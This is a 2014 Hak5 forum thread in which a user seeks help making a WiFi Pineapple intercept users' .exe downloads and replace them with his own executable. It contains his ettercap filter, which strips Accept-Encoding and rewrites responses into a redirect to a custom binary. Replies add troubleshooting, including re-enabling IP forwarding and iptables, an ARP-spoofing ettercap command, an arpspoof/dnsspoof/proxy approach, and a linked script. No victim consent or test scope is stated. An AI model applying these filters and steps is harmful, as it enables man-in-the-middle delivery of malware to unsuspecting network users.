DarkPringles Posted September 16, 2014 Share Posted September 16, 2014 Hi Hak5 community, i have a few problems with implementing some feature to the Wifi Pineapple and hope anybody can help me. My goal is to run a script that replaces every requested *.exe file with a link of my own. Scenario: A user try to download for example VLC Media Player from the official site (http://get.videolan.org/vlc/2.1.5/win32/vlc-2.1.5-win32.exe) over the Wifi Pinapple. The Pinapple intercept this request and replace it with a custom *.exe Link so that the user download and execute my custom executable. In best case i want to implement a tiny text file that saves the ip adress of this user that got the replaced exe and if he tried to redownload his file, he will not get spoofed. But first the replacement. I want to implement a custom ettercap filter that i found on the internet. But everytime i want to use ettercap for a unfined sniffing the internet connection of all clients connected to the pineapple abort. The only way to get ettercap working is to set the "-u" parameter. This option prevents ettercap to disable ip forwarding in the kernel. But with this parameter the usage of filters that replace data in realtime is prohibited. So the final question is how to run ettercap with custom filters or is there any alternative solution for my problem. i hope anyone can help me =) Best regards, DarkPringles, from Germany Source of the filter (i will customize that later) : # replace rmccurdy with your website # replace the url with what ever exe you like if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("keep-alive", "close" "); replace("Keep-Alive", "close" "); } if (ip.proto == TCP && search(DATA.data, ": application") ){ # enable for logging log(DECODED.data, "/tmp/log.log"); msg("found EXEn"); # "Win32" is the first part of the exe example: # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc .. if (search(DATA.data, "Win32")) { msg("doing nothingn"); } else { replace("200 OK", "301 Moved Permanently Location: <snip> "); msg("redirect successn"); } } Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted September 16, 2014 Share Posted September 16, 2014 We have something like this coming, specifically replacing files such as .exe on the go. It is currently written in python, but we have noticed that when lots of clients are browsing, proxying files such as images becomes heavy for the WiFi Pineapple. Writing the same program in C++ has given much better results, so we will see where it takes us. Best Regards, Sebkinne Quote Link to comment Share on other sites More sharing options...
DarkPringles Posted September 16, 2014 Author Share Posted September 16, 2014 Wow, thanks for the quick reply. so i will wait for this cool feature. can you say why all clients gets no internet connection while ettercap runs withour the "-u" parameter ? PS: can you remove the custom link in the ettercap filter source in my post? Quote Link to comment Share on other sites More sharing options...
DarkPringles Posted September 16, 2014 Author Share Posted September 16, 2014 thx =) Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted September 16, 2014 Share Posted September 16, 2014 Wow, thanks for the quick reply. so i will wait for this cool feature. can you say why all clients gets no internet connection while ettercap runs withour the "-u" parameter ? PS: can you remove the custom link in the ettercap filter source in my post? Kann ich leider nicht, ettercap ist etwas buggy.. Mal gucken ob wir vllt an einen neuere Version kommen. Best Regards, Sebkinne Quote Link to comment Share on other sites More sharing options...
DarkPringles Posted September 16, 2014 Author Share Posted September 16, 2014 Traumhaft. Danke für die schnelle Antwort. Großartiges Projekt. Erspart einem Pentester jede Menge Zeit und Nerven. Best regards Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 17, 2014 Share Posted September 17, 2014 http://pastebin.com/n7AHi5Ny it is a subject that needs more work, you need a payload to cover all situations... I have spent some long hours working on this subject and could provide help Quote Link to comment Share on other sites More sharing options...
DarkPringles Posted September 17, 2014 Author Share Posted September 17, 2014 very cool script. i will try in my environment! Quote Link to comment Share on other sites More sharing options...
DarkPringles Posted September 17, 2014 Author Share Posted September 17, 2014 not easy to get this working on the WiFi Pineapple ... but in full Linux Environment this is full working. Thanks for share... awesome work. Quote Link to comment Share on other sites More sharing options...
t31m0 Posted September 17, 2014 Share Posted September 17, 2014 Good idea xDDD ... I'll be waiting xDDDDD Quote Link to comment Share on other sites More sharing options...
whitenoise Posted September 17, 2014 Share Posted September 17, 2014 You can do something like this with Deep Packet Inspection. It is also possible to do it in Python. Add a new chain to your IP tables which directs forwarded TCP packets to NFQUEUE. You can grab the packets with a Python script and decide what to do with them (let them pass, alter them or drop them). What you could do is let the GET request pass to the server and then collect all the segments comming from the server to reassemble the HTML source code (basically sending a lot of Acks). In many cases the content of the segments is compressed so you have to puzzle all together and then decompress them. In a next step you can alter the HTML as you like (replace hyperlinks etc). Then you have to simulate the server connection to the client and transmit the altered HTML in segments back to the client (you can use Scapy for that). Quote Link to comment Share on other sites More sharing options...
daniboy92 Posted September 17, 2014 Share Posted September 17, 2014 I'll be waiting too! Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 17, 2014 Share Posted September 17, 2014 100% reliable proxy written in your choice for the basic framework that suports https aswell, then each exploit could be a plugin If the GET request includes('*.exe') then launch the basic-plugin.rb for the swapping function that meets these if statements... mod the content length andd swap the data Plugins could be the language of your choice, simply handle the specific request and provide a response design for that exploit Quote Link to comment Share on other sites More sharing options...
DarkPringles Posted September 17, 2014 Author Share Posted September 17, 2014 (edited) Kann ich leider nicht, ettercap ist etwas buggy.. Mal gucken ob wir vllt an einen neuere Version kommen. Best Regards, Sebkinne Just found it out. Ettercap disable IP-Forwarding in the kernel before starts sniffing. Just enabled it again ("echo 1 > /proc/sys/net/ipv4/ip_forward") after starting ettercap. After doing it clients get internet connection and you are able to manipulate the traffic with custom ettercap filters.... But manipulating the traffic with ettercap and custom filters is still not possible for me. Ettercap told me that he found a string and replaced it but without impact in the clients webbrowser -.- source of filter: if (ip.proto == TCP) { if (search(DATA.data, "Software")) { replace("Software", "Hardware"); msg("String Replaced \n"); } } Edited September 17, 2014 by darkpringles Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 18, 2014 Share Posted September 18, 2014 (edited) Your ettercap config may need iptables enabled... idk maybe u have already done this Also u need to see plain text, accept-encoding rrplace wi. Azzept-encoding Idk maybe u leedt that part out of your post Edited September 18, 2014 by i8igmac Quote Link to comment Share on other sites More sharing options...
DarkPringles Posted September 18, 2014 Author Share Posted September 18, 2014 (edited) Your ettercap config may need iptables enabled... idk maybe u have already done this Also u need to see plain text, accept-encoding rrplace wi. Azzept-encoding Idk maybe u leedt that part out of your post thanks for help. i forget to replace the encoding part .... -.- my filter is now at this state but no result at the client side =( if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Azzept-encoding"); msg("Enc Skippd \n"); } } if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "software")) { replace("software", "hardware"); msg("Software Replaced \n"); } } Edited September 18, 2014 by darkpringles Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 18, 2014 Share Posted September 18, 2014 (edited) When ettercap starts up. Does it say set the uid? And did you enable iptables in etter.conf ? Also test ur browser at a site that does not use https Msn Yaho Etc Edited September 18, 2014 by i8igmac Quote Link to comment Share on other sites More sharing options...
DarkPringles Posted September 18, 2014 Author Share Posted September 18, 2014 the message is: "Privileges dropped to UID 0 GID 0..." ... iptables are also enabled. i used the same configuration at my kali box with the same results...ettercap found the string but replacement is still without impact. i use non ssl sites to test it. so it has to be a trivial error, because it not work on kali or the pineapple. to sum up. UID change to 0 iptables uncomment in etter.conf the custom filter is like in the post before command in kali: "ettercap -Tq -i wlan0 -F custom-filter" command in pineapple: "ettercap -Tq -i br-lan -F custom-filter" any ideas? thanks for your time! Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 18, 2014 Share Posted September 18, 2014 (edited) http://l33ttutorials.wordpress.com/2014/02/20/tutorial-man-in-the-middle-attack-using-sslstrip-and-arpspoofing-with-kali-linux/ Read this, vm installs or hd installs of kali may cause issues i guess Edit; Its just ettercaps ugly ways lol one day it works another day your like wtf... this frustration is why I wrote a proxy to do the data swap. . . Im sure its a small step you are missing... Arpspoof Dnsspoof And a proxy kungfoo replaces ettercap... Ettercap -T -q -f filter -M ARP // // Its been a few years since I used ettercap Edit; Edited September 18, 2014 by i8igmac Quote Link to comment Share on other sites More sharing options...
johnjdoe Posted September 18, 2014 Share Posted September 18, 2014 Kann ich leider nicht, ettercap ist etwas buggy.. Mal gucken ob wir vllt an einen neuere Version kommen. Best Regards, Sebkinne Ist zwar OT, aber schon ganz schön cool zu lesen, dass Sebkinne Deutsch kann! Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted September 18, 2014 Share Posted September 18, 2014 Ist zwar OT, aber schon ganz schön cool zu lesen, dass Sebkinne Deutsch kann! Kann? Bin! Quote Link to comment Share on other sites More sharing options...
johnjdoe Posted September 18, 2014 Share Posted September 18, 2014 Kann? Bin! Super, also nicht nur "kann", sondern sogar "bin"! Freut mich! Quote Link to comment Share on other sites More sharing options...
whitenoise Posted September 18, 2014 Share Posted September 18, 2014 (edited) Wenn Ettercap Zeichenketten austauscht, korrigiert es dann auch die Paketlänge? Falls nicht kann das dazu führen, dass das Paket am anderen Ende zwecks Fehler verworfen wird. Wenn man die Pakete verändert muss man nicht nur die Länge sondern auch die Prüfsumme neu berechnen! :P // Does Ettercap recalculate the lenght of the packet (and the checksum) ? This might be a problem because wrong packets might be dropped by the client. Edited September 18, 2014 by whitenoise Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted September 18, 2014 Share Posted September 18, 2014 In my proxy, I make sure that the length is recalculated on injection. In regards to ettercap, I genuinely do not know, I haven't got too much experience, but I would expect it does. I'll take a look at the source this weekend. I am expecting to launch my proxy by the end of the month / start of next month. Best, Sebkinne Quote Link to comment Share on other sites More sharing options...
i8igmac Posted September 18, 2014 Share Posted September 18, 2014 From my experience, I remember swapping data with ettercap, if the string size was larger then the original then the clients browser wwould not always provide the correct amount of data, for example the page source may be missing at the end </HTML> replace(12345, 1234567) Page may be missing L> </HTM Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.